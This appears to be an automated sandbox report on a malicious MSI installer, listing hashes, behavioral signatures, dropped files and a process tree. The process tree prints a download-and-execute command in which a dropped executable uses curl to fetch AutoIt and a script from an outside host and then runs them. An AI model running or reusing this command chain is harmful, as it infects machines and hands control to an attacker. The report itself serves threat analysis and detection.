Overview
overview
10Static
static
10f33535fb28...a7.exe
windows7-x64
10f33535fb28...a7.exe
windows10-2004-x64
10f3476b5441...96.exe
windows7-x64
10f3476b5441...96.exe
windows10-2004-x64
10f479112f0f...e2.msi
windows7-x64
7f479112f0f...e2.msi
windows10-2004-x64
8f64398ee74...a4.exe
windows7-x64
10f64398ee74...a4.exe
windows10-2004-x64
10f672ba8bf0...6f.exe
windows7-x64
10f672ba8bf0...6f.exe
windows10-2004-x64
10f92501ffd4...76.exe
windows7-x64
10f92501ffd4...76.exe
windows10-2004-x64
10fa20559cba...8e.exe
windows7-x64
10fa20559cba...8e.exe
windows10-2004-x64
10fa98feb0fc...05.exe
windows7-x64
7fa98feb0fc...05.exe
windows10-2004-x64
7fb1c133bb4...90.exe
windows7-x64
10fb1c133bb4...90.exe
windows10-2004-x64
10fbce724386...fe.exe
windows7-x64
10fbce724386...fe.exe
windows10-2004-x64
10fc82f1f187...54.exe
windows7-x64
10fc82f1f187...54.exe
windows10-2004-x64
10fd03ea32f5...54.exe
windows7-x64
7fd03ea32f5...54.exe
windows10-2004-x64
7fe21006be0...ea.exe
windows7-x64
10fe21006be0...ea.exe
windows10-2004-x64
10fe53c0822d...00.elf
debian-9-armhf
1fe6b8e0d18...a4.exe
windows7-x64
10fe6b8e0d18...a4.exe
windows10-2004-x64
10ff53a80edb...60.bat
windows7-x64
7ff53a80edb...60.bat
windows10-2004-x64
7ffbd6ffb75...4e.exe
windows7-x64
10Analysis
-
max time kernel
133s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 13:04
Behavioral task
behavioral1
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
fe53c0822d0b31a92436603f7f1d8892ecc21e43b5524767f83e93f05af0f500.elf
Resource
debian9-armhf-20230831-en
Behavioral task
behavioral28
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win7-20230831-en
Behavioral task
behavioral29
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral30
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win7-20230831-en
Behavioral task
behavioral31
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral32
Sample
ffbd6ffb75e77b342f3caa7729254ef5dc198c783a78310d74923fd86ce4614e.exe
Resource
win7-20230831-en
General
-
Target
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
-
Size
660KB
-
MD5
8e68a2869daf1ba9eaebf31d2d87973e
-
SHA1
739627919a7d4b972454158911edce0106eb5df0
-
SHA256
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2
-
SHA512
35997befc485f7491e5e0fd0cb50a3e5a2f7111638eeb58d36498f68c48d380d9c08d2d03f8c49cc0300830438550e2fb7fa3ac4f9f1bcede2bcad3f3b14f513
-
SSDEEP
12288:ntvRQ+gjpjegGdo8kgLKxBTi9byLw2wHvHgU3qfrbDW:ntncpVGPkgtyLHw33qjbD
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4740 KeyScramblerLogon.exe 3564 Autoit3.exe -
Loads dropped DLL 3 IoCs
pid Process 380 MsiExec.exe 4740 KeyScramblerLogon.exe 4740 KeyScramblerLogon.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2156 ICACLS.EXE 224 ICACLS.EXE -
Blocklisted process makes network request 4 IoCs
flow pid Process 26 3560 msiexec.exe 27 3560 msiexec.exe 29 3560 msiexec.exe 31 3560 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Installer\SourceHash{DDF6203D-8744-4725-BE80-0CC782D3696F} msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\Installer\e59f795.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF94A.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File created C:\Windows\Installer\e59f795.msi msiexec.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2324 4740 WerFault.exe 109 -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d6f92995d065bd40000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d6f92990000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d6f9299000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d6f9299000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d6f929900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 792 msiexec.exe 792 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeShutdownPrivilege 3560 msiexec.exe Token: SeIncreaseQuotaPrivilege 3560 msiexec.exe Token: SeSecurityPrivilege 792 msiexec.exe Token: SeCreateTokenPrivilege 3560 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3560 msiexec.exe Token: SeLockMemoryPrivilege 3560 msiexec.exe Token: SeIncreaseQuotaPrivilege 3560 msiexec.exe Token: SeMachineAccountPrivilege 3560 msiexec.exe Token: SeTcbPrivilege 3560 msiexec.exe Token: SeSecurityPrivilege 3560 msiexec.exe Token: SeTakeOwnershipPrivilege 3560 msiexec.exe Token: SeLoadDriverPrivilege 3560 msiexec.exe Token: SeSystemProfilePrivilege 3560 msiexec.exe Token: SeSystemtimePrivilege 3560 msiexec.exe Token: SeProfSingleProcessPrivilege 3560 msiexec.exe Token: SeIncBasePriorityPrivilege 3560 msiexec.exe Token: SeCreatePagefilePrivilege 3560 msiexec.exe Token: SeCreatePermanentPrivilege 3560 msiexec.exe Token: SeBackupPrivilege 3560 msiexec.exe Token: SeRestorePrivilege 3560 msiexec.exe Token: SeShutdownPrivilege 3560 msiexec.exe Token: SeDebugPrivilege 3560 msiexec.exe Token: SeAuditPrivilege 3560 msiexec.exe Token: SeSystemEnvironmentPrivilege 3560 msiexec.exe Token: SeChangeNotifyPrivilege 3560 msiexec.exe Token: SeRemoteShutdownPrivilege 3560 msiexec.exe Token: SeUndockPrivilege 3560 msiexec.exe Token: SeSyncAgentPrivilege 3560 msiexec.exe Token: SeEnableDelegationPrivilege 3560 msiexec.exe Token: SeManageVolumePrivilege 3560 msiexec.exe Token: SeImpersonatePrivilege 3560 msiexec.exe Token: SeCreateGlobalPrivilege 3560 msiexec.exe Token: SeBackupPrivilege 1028 vssvc.exe Token: SeRestorePrivilege 1028 vssvc.exe Token: SeAuditPrivilege 1028 vssvc.exe Token: SeBackupPrivilege 792 msiexec.exe Token: SeRestorePrivilege 792 msiexec.exe Token: SeRestorePrivilege 792 msiexec.exe Token: SeTakeOwnershipPrivilege 792 msiexec.exe Token: SeRestorePrivilege 792 msiexec.exe Token: SeTakeOwnershipPrivilege 792 msiexec.exe Token: SeBackupPrivilege 3028 srtasks.exe Token: SeRestorePrivilege 3028 srtasks.exe Token: SeSecurityPrivilege 3028 srtasks.exe Token: SeTakeOwnershipPrivilege 3028 srtasks.exe Token: SeBackupPrivilege 3028 srtasks.exe Token: SeRestorePrivilege 3028 srtasks.exe Token: SeSecurityPrivilege 3028 srtasks.exe Token: SeTakeOwnershipPrivilege 3028 srtasks.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3560 msiexec.exe 3560 msiexec.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 792 wrote to memory of 3028 792 msiexec.exe 102 PID 792 wrote to memory of 3028 792 msiexec.exe 102 PID 792 wrote to memory of 380 792 msiexec.exe 104 PID 792 wrote to memory of 380 792 msiexec.exe 104 PID 792 wrote to memory of 380 792 msiexec.exe 104 PID 380 wrote to memory of 2156 380 MsiExec.exe 105 PID 380 wrote to memory of 2156 380 MsiExec.exe 105 PID 380 wrote to memory of 2156 380 MsiExec.exe 105 PID 380 wrote to memory of 4108 380 MsiExec.exe 107 PID 380 wrote to memory of 4108 380 MsiExec.exe 107 PID 380 wrote to memory of 4108 380 MsiExec.exe 107 PID 380 wrote to memory of 4740 380 MsiExec.exe 109 PID 380 wrote to memory of 4740 380 MsiExec.exe 109 PID 380 wrote to memory of 4740 380 MsiExec.exe 109 PID 4740 wrote to memory of 1916 4740 KeyScramblerLogon.exe 110 PID 4740 wrote to memory of 1916 4740 KeyScramblerLogon.exe 110 PID 4740 wrote to memory of 1916 4740 KeyScramblerLogon.exe 110 PID 1916 wrote to memory of 892 1916 cmd.exe 113 PID 1916 wrote to memory of 892 1916 cmd.exe 113 PID 1916 wrote to memory of 892 1916 cmd.exe 113 PID 1916 wrote to memory of 472 1916 cmd.exe 115 PID 1916 wrote to memory of 472 1916 cmd.exe 115 PID 1916 wrote to memory of 472 1916 cmd.exe 115 PID 1916 wrote to memory of 3564 1916 cmd.exe 116 PID 1916 wrote to memory of 3564 1916 cmd.exe 116 PID 1916 wrote to memory of 3564 1916 cmd.exe 116 PID 380 wrote to memory of 2532 380 MsiExec.exe 118 PID 380 wrote to memory of 2532 380 MsiExec.exe 118 PID 380 wrote to memory of 2532 380 MsiExec.exe 118 PID 380 wrote to memory of 224 380 MsiExec.exe 119 PID 380 wrote to memory of 224 380 MsiExec.exe 119 PID 380 wrote to memory of 224 380 MsiExec.exe 119 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3560
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2296B5A19DE839C69553362A72C078A02⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:2156
-
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:4108
-
-
C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe"C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.execmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au34⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\curl.execurl -o Autoit3.exe http://piret-wismann.com:23515⤵PID:892
-
-
C:\Windows\SysWOW64\curl.execurl -o cztngt.au3 http://piret-wismann.com:2351/cztngt5⤵PID:472
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exeAutoit3.exe cztngt.au35⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 4524⤵
- Program crash
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files"3⤵PID:2532
-
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\." /SETINTEGRITYLEVEL (CI)(OI)LOW3⤵
- Modifies file permissions
PID:224
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4740 -ip 47401⤵PID:452
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
39KB
MD5b1dfc18e0251b7bbc92beb3182ee6c74
SHA10b52e4a95c2361776c3a92100d2457ab1966659e
SHA256622739cfefff5115fe240409a10a8cd2b9c457f72e8c306a6389d21e542227e8
SHA5127a852b6f042d43be79caff6b26abcf9ec7d9508fe5ea112bfcd6ac6c5715868a72a3c9d78117ef38e8dfc0521d3596074baf4dca6c03aab70975801cf9347c6c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1
Filesize727B
MD54e25d0434bd1f6cf35ee2c332255e571
SHA195a58811cbde3a2513d7fb8210e79545d45b8ab4
SHA2568bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9
SHA51209ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05
Filesize314B
MD5f153c5899438c7098bb30aa1cf6fbbc5
SHA17dd43c92578b95c1fafae7dc41dc8a1f1ea9d1e4
SHA25688e87bd27608869aa9c1d5599eeafa2de78fcfa05723df82485eafe2cbfaeffa
SHA51290ab61882e07f75336b3e43fe3e0f463f85a2c1b72a26d1d9663b1f77fd624d2fb625411f7653e9f9fade731aa983022fa34dd916cedd10809dfd5027e0d8c89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1
Filesize478B
MD573e56c89a52beb4f322190d9d6d917e7
SHA1a8a6147207a14de1477c3d634851fac85c9a7ac6
SHA256afd5b1caa8e1771209b7857659a6df89917777fc0a3d3638ae6ff596692c27f8
SHA512aad0fe512a074f7c0c9a710f2e435b3d5b8bf744965304d0c585420e000e5fda67410a57480b1c1911bf83190ff517751bc26b4493ff274273e07ef7d606e68b
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
403KB
MD53a268087f8f162c60aa24d4fb9bd1b2b
SHA1b942dd465d2044953fb3ef9eb91f1d6138101687
SHA25653beb7204377b417d7439b84bdaee22a6c72eeb3fd1579dde8e0ad69506188c3
SHA512eadd2b867b5b352b866361546d5265d332c669ceff70bd375a703a1ee0b9e2e64c5d4e66c437854308427f7285efd101d4f85356e03ed1c5a7c5a76a3e0a9613
-
Filesize
454KB
MD59e0ae735a86eb8f0dc472f267ebbb74c
SHA153ff35f13620da5a432cd5dfac933749f070b74d
SHA2566978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a
SHA512b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222
-
Filesize
454KB
MD59e0ae735a86eb8f0dc472f267ebbb74c
SHA153ff35f13620da5a432cd5dfac933749f070b74d
SHA2566978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a
SHA512b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222
-
Filesize
454KB
MD59e0ae735a86eb8f0dc472f267ebbb74c
SHA153ff35f13620da5a432cd5dfac933749f070b74d
SHA2566978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a
SHA512b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222
-
C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe
Filesize500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe
Filesize500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
Filesize
1KB
MD5a1ffe1004e107b440d998de03ea34051
SHA14a479c010046b90a3f3c6fc620bb9f5a0487f69d
SHA25693c6cbc52c204480404123266f683f617c89c456ce401c7f3d84cc785e129b58
SHA5122f4bc99814f7f53097485135e7ae4d3c9d230cc8074c7b2fe5ec43ce65d9e028e2f2bd615181cb81f9af309b5cdc5ce85cafb58cd4bc070aec130fd0da118254
-
Filesize
1KB
MD5bddd298df236f4811b8957619f7f1a81
SHA1a5cbcc784fc310b6657b402a7dbd33844ff06296
SHA256b4aeb2eb4a119befe91344a51782ff8e1aa3fdb7e929345e6ab48933bff8382e
SHA51275d7bc0347c0330582741b1b463e8e20da3919e32c4b34e9f2514fd1c4555013269f8f87ca351f0ac8efa39a42c2e7ae370a981a3aa91b0d717d4f1606e1ff4c
-
Filesize
1KB
MD5bddd298df236f4811b8957619f7f1a81
SHA1a5cbcc784fc310b6657b402a7dbd33844ff06296
SHA256b4aeb2eb4a119befe91344a51782ff8e1aa3fdb7e929345e6ab48933bff8382e
SHA51275d7bc0347c0330582741b1b463e8e20da3919e32c4b34e9f2514fd1c4555013269f8f87ca351f0ac8efa39a42c2e7ae370a981a3aa91b0d717d4f1606e1ff4c
-
Filesize
85KB
MD57d00d7b1509350ef42de43b28a2efeec
SHA1a2deca1c9c48e0402d34ab9b66b63a335e827bf1
SHA2564aea930309b590d34488187a8c9cb31b83ff1faa2ff4d27606e50fac3a0db742
SHA5127597f436966a662451bc495ce7758f493af607479cf63ebc521a4a9f178f6ae9dd22b47e5953a0fa2780a695b021e6e4c5d58301053eed0778fd07f89876f625
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
380KB
MD5b537196e2a994f2abca7c0b03bd137e0
SHA1a99417120a1a5a600304df2eb1d8a90c62d81324
SHA256bd1d18226a18b8e9eb3819f8e07ad1c205c0f3562f7eb70c4b70a69d92a3adc1
